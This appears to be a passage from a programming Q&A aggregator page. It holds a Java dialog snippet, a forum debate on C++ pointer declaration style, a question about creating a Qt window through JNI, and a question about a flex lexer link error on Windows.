                String sAge = JOptionPane.showInputDialog(null, "What is your age?");
                String sex = JOptionPane.showInputDialog(null, "What is your sex?\n(Enter m or f)");

                if (sex == "m"){
                    JOptionPane.showMessageDialog(null, "Well done, you are male.\nKeep Going!");
                }

                int age = Integer.parseInt(sAge);
                String chars = JOptionPane.showInputDialog(null, "Name three charectaristics");
            }
        }

    Read the article

  • What's your preferred pointer declaration style, and why?

    - by Owen
    I know this is about as bad as it gets for "religious" issues, as Jeff calls them. But I want to know why the people who disagree with me on this do so, and hear their justification for their horrific style. I googled for a while and couldn't find a style guide talking about this. So here's how I feel pointers (and references) should be declared:

        int* pointer = NULL;
        int& ref = *pointer;
        int*& pointer_ref = pointer;

    The asterisk or ampersand goes with the type, because it modifies the type of the variable being declared.

    EDIT: I hate to keep repeating the word, but when I say it modifies the type I'm speaking semantically. "int* something;" would translate into English as something like "I declare something, which is a pointer to an integer." The "pointer" goes along with the "integer" much more so than it does with the "something." In contrast, the other uses of the ampersand and asterisk, as address-of and dereferencing operators, act on a variable.

    Here are the other two styles (maybe there are more but I really hope not):

        int *ugly_but_common;
        int * uglier_but_fortunately_less_common;

    Why? Really, why? I can never think of a case where the second is appropriate, and the first only suitable perhaps with something like:

        int *hag, *beast;

    But come now... multiple variable declarations on one line is kind of ugly form in itself already.
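    For readers weighing the two camps, a small sketch of the usual counter-argument (an illustration added here, not part of the original post): the declarator grammar binds the asterisk to each declared name, so the type-attached style can mislead when several variables share one declaration:

        #include <cstddef>

        int main()
        {
            // Written in the "asterisk with the type" style this looks like two
            // pointers, but the grammar binds * to each declarator: only a is an
            // int*, while b is a plain int.
            int* a = NULL, b = 0;

            // The "asterisk with the variable" camp argues this form makes the
            // per-name binding explicit:
            int *c = NULL, *d = NULL;

            // One declaration per line avoids the ambiguity in either style.
            int* e = NULL;
            int* f = NULL;

            (void)a; (void)b; (void)c; (void)d; (void)e; (void)f;
            return 0;
        }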

    Read the article

  • Creating a QMainWindow from Java using JNI

    - by ebasconp
    Hi everybody: I'm trying to create a Qt main window from Java using JNI directly, and I get a threading error. My code looks like this:

    Test class:

        public class Test {
            public static void main(String... args) {
                System.out.println(System.getProperty("java.library.path"));
                TestWindow f = new TestWindow();
                f.show();
            }
        }

    TestWindow class:

        public class TestWindow {
            static {
                System.loadLibrary("mylib");
            }

            public native void show();
        }

    C++ impl:

        void JNICALL Java_testpackage_TestWindow_show(JNIEnv *, jobject)
        {
            int c = 0;
            char** a = NULL;
            QApplication* app = new QApplication(c, a);

            QMainWindow* mw = new QMainWindow();
            mw->setWindowTitle("Hello");
            mw->setGeometry(150, 150, 400, 300);
            mw->show();

            QApplication::exec();
        }

    I get my window painted but frozen (it does not receive any events), and the following error message when instantiating the QMainWindow object:

        QCoreApplication::sendPostedEvents: Cannot send posted events for objects in another thread

    I know all the UI operations must be done in the UI thread, but in my example I created the QApplication in the only thread I have running, so everything should work properly. I did some tests executing the code of my "show" method through a QMetaObject::invokeMethod call using Qt::QueuedConnection, but nothing worked properly.

    I know I could use Jambi... but I know this can be done natively too, and that is what I want to do :) Any ideas on this? Thanks in advance! Ernesto

    Read the article

  • Flex build error

    - by incrediman
    I'm totally new to flex. I'm getting a build error when using flex. That is, I've generated a .c file using flex and, when building it, am getting this error:

        1>lextest.obj : error LNK2001: unresolved external symbol "int __cdecl isatty(int)" (?isatty@@YAHH@Z)
        1>C:\...\lextest.exe : fatal error LNK1120: 1 unresolved externals

    Here is the lex file I'm using (grabbed from here):

        /*** Definition section ***/

        %{
        /* C code to be copied verbatim */
        #include <stdio.h>
        %}

        /* This tells flex to read only one input file */
        %option noyywrap

        %%
            /*** Rules section ***/

            /* [0-9]+ matches a string of one or more digits */
        [0-9]+  {
                    /* yytext is a string containing the matched text. */
                    printf("Saw an integer: %s\n", yytext);
                }

        .       { /* Ignore all other characters. */ }

        %%
        /*** C Code section ***/

        int main(void)
        {
            /* Call the lexer, then quit. */
            yylex();
            return 0;
        }

    As well, why do I have to put a 'main' function in the lex syntax code? What I'd like is to be able to call yylex() from another C file.
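    A sketch of one common workaround, assuming the generated scanner is being built with MSVC as C++ (which the mangled ?isatty@@YAHH@Z name suggests): the scanner calls isatty() to decide whether its input is interactive, and the Windows CRT only provides that function as _isatty in <io.h>. Mapping the names in the %{ ... %} block of the .l file usually resolves the link error; adding %option never-interactive, which stops flex from probing for a terminal at all, is another frequently used fix. The block below is a hypothetical addition, not part of the tutorial file:

        /* Hypothetical addition to the %{ ... %} block of the .l file. */
        #include <stdio.h>

        #ifdef _WIN32
          /* MSVC ships the POSIX functions under underscore-prefixed names. */
          #include <io.h>
          #define isatty  _isatty
          #define fileno  _fileno
        #endif

    Separately, the main() in the last section is optional: flex itself does not need it, so you can delete that block, declare extern int yylex(void); in another C file, and call yylex() from there, as long as something in the program ultimately defines main.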

    Read the article
